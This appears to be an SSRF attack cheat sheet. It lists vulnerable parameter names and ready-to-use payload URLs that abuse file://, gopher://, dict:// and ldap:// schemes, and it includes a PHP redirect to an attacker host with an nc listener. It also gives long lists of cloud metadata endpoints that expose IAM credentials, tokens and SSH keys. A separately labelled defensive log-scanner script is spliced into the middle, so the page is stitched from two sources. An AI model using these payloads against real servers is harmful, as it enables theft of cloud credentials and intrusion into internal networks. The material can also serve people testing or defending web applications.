Server Side Request Forgery (SSRF)

Possible Parameters

"dest",
"redirect",
"uri",
"path",
"continue",
"url",
"window",
"next",
"data",
"reference",
"site",
"html",
"val",
"validate",
"domain",
"callback",
"return",
"page",
"feed",
"host",
"port",
"to",
"out",
"view",
"dir",
"show",
"navigation",
"open"

What can we do with SSRF?

  • SSRF to Reflected XSS
  • Try other URL schemes to read internal resources and make the server perform actions (file:///, dict://, ftp://, gopher://, ...)
  • Scan internal networks and ports from the server's vantage point
  • If the server runs on a cloud instance, try to fetch its metadata service
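As an added example (not code from the original page), here is a Python scanner for the defending side: it reads web-server access-log lines, looks only at the parameter names in the list above, and flags values that carry the schemes or metadata hosts named on this page. The log lines are constructed samples in Common Log Format, not real traffic; the function and variable names are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names taken from the page's "Possible Parameters" list.
SSRF_PARAMS = {
    "dest", "redirect", "uri", "path", "continue", "url", "window", "next",
    "data", "reference", "site", "html", "val", "validate", "domain", "callback",
    "return", "page", "feed", "host", "port", "to", "out", "view", "dir", "show",
    "navigation", "open",
}

# Schemes the page lists; a fetch parameter should only ever carry http(s).
RISKY_SCHEMES = {"file", "dict", "gopher", "ftp", "sftp", "tftp", "ldap", "ldaps", "ldapi"}

# Metadata-service names and addresses quoted on the page.
METADATA_HOSTS = {
    "169.254.169.254", "metadata.google.internal", "metadata",
    "192.0.0.192", "100.100.100.200",
}

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_value(value):
    """Return a reason string if a parameter value looks like an SSRF probe, else None."""
    parts = urlsplit(value.strip())
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if scheme in RISKY_SCHEMES:
        return f"non-http scheme {scheme}://"
    if host in METADATA_HOSTS or host.startswith("169.254."):
        return f"cloud metadata / link-local host {host}"
    if host in {"localhost", "0.0.0.0", "::1"} or host.startswith("127."):
        return f"loopback host {host}"
    return None


def scan_access_log(lines):
    """Parse each log line, decode its query string once, and flag SSRF-looking parameter values."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not in the expected log format; skip rather than guess
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes values, so file%3A%2F%2F... is seen as file://...
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name.lower() not in SSRF_PARAMS:
                continue
            for value in values:
                reason = classify_value(value)
                if reason:
                    findings.append({
                        "client": match.group("client"),
                        "time": match.group("time"),
                        "status": int(match.group("status")),
                        "param": name,
                        "value": value,
                        "reason": reason,
                    })
    return findings


# Constructed sample lines (not real traffic); the value shapes mirror the page's examples.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /ssrf.php?url=file:///etc/passwd HTTP/1.1" 200 1287',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /ssrf.php?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /fetch?url=https://www.example.org/feed.xml HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Oct/2023:13:56:15 +0000] "GET /ssrf.php?url=ldap%3A%2F%2Flocalhost%3A1337%2F%250astats%250aquit HTTP/1.1" 500 0',
    '203.0.113.7 - - [10/Oct/2023:13:56:22 +0000] "GET /ssrf.php?url=http://metadata.google.internal/computeMetadata/v1beta1/ HTTP/1.1" 403 0',
    '198.51.100.9 - - [10/Oct/2023:13:57:02 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} status={f['status']} {f['param']}={f['value']!r}: {f['reason']}")
```

The status code is kept in each finding because a 200 on a metadata URL is a very different signal from a 403 or 500: the first says the fetch succeeded and the response likely reached the client. Values are decoded exactly once by parse_qs, so a double-encoded payload (the ldap line) is matched on its scheme without the raw newlines ever being interpreted by the scanner.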

SSRF to Reflected XSS

Make the server fetch a file from an external site that contains the payload and is served with an HTML content type; when the fetched response is returned to the browser, the payload executes as reflected XSS.

SSRF to LFI

The file:// scheme reads a file from the server's file system:

http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini
Other schemes:

http://example.com/ssrf.php?url=dict://evil.com:1337/
http://example.com/ssrf.php?url=sftp://evil.com:1337/
http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldaps://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=ldapi://localhost:1337/%0astats%0aquit
http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET
Redirect to gopher:// via an attacker-controlled page:

http://example.com/ssrf.php?url=http://attacker.com/gopher.php

Payload (gopher.php):
<?php
header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');
?>
Attacker:

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
Hi
Amazon AWS:

http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance

Example: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
Google:

http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

# AWS - Dirs

http://169.254.169.254/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/public-keys/

## Google Cloud
# https://cloud.google.com/compute/docs/metadata
# - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"

http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id

# Google allows recursive pulls
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true

## Google
# Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)

http://metadata.google.internal/computeMetadata/v1beta1/

## Digital Ocean
# https://developers.digitalocean.com/documentation/metadata/

http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

## Packetcloud

https://metadata.packet.net/userdata

## Azure
# Limited, maybe more exist?
# https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
http://169.254.169.254/metadata/v1/maintenance

## Update Apr 2017, Azure has more support; requires the header "Metadata: true"
# https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text

## OpenStack/RackSpace
# (header required? unknown)
http://169.254.169.254/openstack

## HP Helion
# (header required? unknown)
http://169.254.169.254/2009-04-04/meta-data/

## Oracle Cloud
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/

## Alibaba
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id